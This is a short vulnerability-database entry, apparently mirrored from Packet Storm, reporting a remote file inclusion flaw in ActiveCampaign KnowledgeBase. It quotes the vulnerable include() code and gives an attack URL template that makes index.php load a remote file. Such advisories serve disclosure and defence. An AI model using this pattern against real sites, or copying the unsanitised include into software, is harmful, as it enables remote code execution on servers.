Lucene search

K

knowledgeBuilder.txt

๐Ÿ—“๏ธย 17 Mar 2005ย 00:00:00Reported byย Dominus VisTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 17ย Views

Remote file inclusion vulnerability in ActiveCampaign KnowledgeBase index.php page.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
  
Remote File Inclusion  
  
KnowledgeBase  
Vendor: www.activecampaign.com/kb/  
  
Well, inside the index.php file we can see:  
  
if ($page == ""){  
$page = "startup";  
}  
@include("$page.php");  
?>  
  
After I tested some sites with kb I got file inclusion:  
http://www.site.com/kb/index.php?page=http://[file]  
  
Dominus_Vis  
[Infektion Group]  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
17
.json
Report